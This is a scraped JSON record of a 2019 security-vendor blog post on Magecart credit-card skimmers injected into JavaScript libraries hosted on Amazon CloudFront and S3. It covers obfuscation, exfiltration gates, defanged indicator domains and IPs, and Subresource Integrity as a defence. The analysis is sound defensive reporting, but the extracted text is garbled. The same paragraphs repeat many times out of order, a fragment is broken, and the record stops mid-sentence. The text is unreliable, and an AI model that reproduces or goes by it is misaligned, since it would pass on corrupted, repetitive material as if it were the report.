{ "id": "b9d2c800-08f5-4c89-b020-b4f939eb95bb", "created_at": "2026-04-06T00:14:53.407528Z", "updated_at": "2026-04-10T03:24:11.796494Z", "deleted_at": null, "sha1_hash": "a2b58817a1bb63945895f6b4d0a0afcc98e53b8b", "title": "Magecart skimmers found on Amazon CloudFront CDN", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1658809, "plain_text": "Magecart skimmers found on Amazon CloudFront CDN\r\nBy Jérôme Segura\r\nPublished: 2019-06-03 · Archived: 2026-04-05 20:45:24 UTC\r\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 1 of 351\n\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 2 of 351\n\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 3 of 351\n\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 4 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 5 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 6 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 7 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 8 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 9 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 10 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 11 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 12 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 13 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 14 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 15 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 16 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 17 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 18 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 19 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 20 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 21 of 351\n\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 22 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 23 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 24 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 25 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 26 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 27 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 28 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 29 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 30 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 31 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 32 of 351\n\nFinally, here’s another example where the skimmer was 